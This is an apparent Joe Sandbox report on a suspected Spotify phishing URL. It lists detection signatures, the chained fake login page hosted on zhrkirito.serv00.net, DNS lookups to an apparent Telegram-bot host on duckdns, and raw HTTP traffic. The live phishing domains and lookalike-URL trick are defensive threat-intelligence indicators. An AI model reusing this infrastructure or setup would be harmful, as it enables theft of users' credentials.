Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://premium-subscriΡtion.app/plan

Overview

General Information

Sample URL:https://premium-subscriΡtion.app/plan
Analysis ID:1589636
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
Uses dynamic DNS services
HTML body contains low number of good links
HTML title does not match URL
Invalid 'forgot password' link found
Suspicious form URL found

Classification

  • System is w10x64
  • chrome.exe (PID: 3128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1924,i,16657322928032054083,1453101877799842923,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://premium-subscription.app/plan" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://premium-subscription.app/planAvira URL Cloud: detection malicious, Label: phishing
Source: https://premium-subscription.app/plan/Avira URL Cloud: Label: phishing

Phishing

barindex
Source: https://premium-subscription.app/plan/apps/Joe Sandbox AI: Score: 9 Reasons: The brand 'Spotify' is well-known and typically associated with the domain 'spotify.com'., The URL 'premium-subscription.app' does not match the legitimate domain 'spotify.com'., The use of a generic domain extension '.app' and the presence of 'premium-subscription' in the URL are suspicious and not typical for Spotify., The URL does not contain any direct reference to 'Spotify', which is a common tactic in phishing attempts to mislead users., The input fields 'Email or username' and 'Password' are typical targets for phishing attacks, especially when combined with a suspicious URL. DOM: 1.1.pages.csv
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://zhrkirito.serv00.net/spotify/app/auth/logi... The provided JavaScript snippet exhibits several high-risk behaviors, including data exfiltration, redirects to potentially malicious domains, and the use of dynamic code execution. While the script may have a legitimate purpose, such as handling user login functionality, the implementation raises significant security concerns.
Source: https://premium-subscription.app/plan/apps/HTTP Parser: Number of links: 0
Source: https://premium-subscription.app/plan/apps/HTTP Parser: Title: Welcome does not match URL
Source: https://premium-subscription.app/plan/apps/HTTP Parser: Invalid link: Forgot your password?
Source: https://premium-subscription.app/plan/apps/HTTP Parser: Form action: action.php
Source: https://premium-subscription.app/plan/apps/HTTP Parser: Form action: action.php
Source: https://premium-subscription.app/plan/apps/HTTP Parser: <input type="password" .../> found
Source: https://premium-subscription.app/plan/apps/HTTP Parser: No favicon
Source: https://premium-subscription.app/plan/apps/HTTP Parser: No favicon
Source: https://premium-subscription.app/plan/apps/HTTP Parser: No <meta name="author".. found
Source: https://premium-subscription.app/plan/apps/HTTP Parser: No <meta name="author".. found
Source: https://premium-subscription.app/plan/apps/HTTP Parser: No <meta name="copyright".. found
Source: https://premium-subscription.app/plan/apps/HTTP Parser: No <meta name="copyright".. found

Networking

barindex
Source: unknownDNS query: name: _5001._https.telegrambotcheck.duckdns.org
Source: unknownDNS query: name: telegrambotcheck.duckdns.org
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.131
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.131
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /plan HTTP/1.1Host: premium-subscription.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plan/ HTTP/1.1Host: premium-subscription.appConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plan/apps/ HTTP/1.1Host: premium-subscription.appConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://premium-subscription.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/ HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://premium-subscription.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/login.php HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://premium-subscription.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.7.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://zhrkirito.serv00.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/app.css HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://zhrkirito.serv00.net/spotify/app/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/logo.png HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zhrkirito.serv00.net/spotify/app/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/loading.gif HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zhrkirito.serv00.net/spotify/app/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/remember.png HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zhrkirito.serv00.net/spotify/app/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/cdn/jq.js HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://zhrkirito.serv00.net/spotify/app/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.7.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/jquery.js HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://zhrkirito.serv00.net/spotify/app/auth/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/logo.png HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets.00/spotify-icon-2048x2048-n3imyp8e.png HTTP/1.1Host: static-00.iconduck.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://premium-subscription.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/remember.png HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/loading.gif HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/cdn/jq.js HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /spotify/app/auth/res/jquery.js HTTP/1.1Host: zhrkirito.serv00.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets.00/spotify-icon-2048x2048-n3imyp8e.png HTTP/1.1Host: static-00.iconduck.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: premium-subscription.app
Source: global trafficDNS traffic detected: DNS query: zhrkirito.serv00.net
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: telegrambotcheck.duckdns.org
Source: global trafficDNS traffic detected: DNS query: _5001._https.telegrambotcheck.duckdns.org
Source: global trafficDNS traffic detected: DNS query: static-00.iconduck.com
Source: global trafficDNS traffic detected: DNS query: crt.sectigo.com
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.jquery.com/ticket/13393
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.jquery.com/ticket/4833
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_69.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://drafts.csswg.org/css-conditional-4/#dfn-support-selector
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://drafts.csswg.org/css-conditional-4/#typedef-supports-selector-fn
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://drafts.csswg.org/selectors/#forgiving-selector
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://drafts.csswg.org/selectors/#relational
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://github.com/whatwg/html/issues/2369
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://html.spec.whatwg.org/#nonce-attributes
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://jquery.com/
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://jquery.org/license
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://js.foundation/
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://promisesaplus.com/#point-48
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://promisesaplus.com/#point-54
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://promisesaplus.com/#point-57
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://promisesaplus.com/#point-59
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://promisesaplus.com/#point-61
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://promisesaplus.com/#point-64
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://promisesaplus.com/#point-75
Source: chromecache_58.2.dr, chromecache_66.2.drString found in binary or memory: https://sizzlejs.com/
Source: chromecache_73.2.drString found in binary or memory: https://static-00.iconduck.com/assets.00/spotify-icon-2048x2048-n3imyp8e.png
Source: chromecache_73.2.drString found in binary or memory: https://zhrkirito.serv00.net/spotify/app
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: classification engineClassification label: mal72.phis.troj.win@17/36@20/11
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1924,i,16657322928032054083,1453101877799842923,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://premium-subscription.app/plan"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1924,i,16657322928032054083,1453101877799842923,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
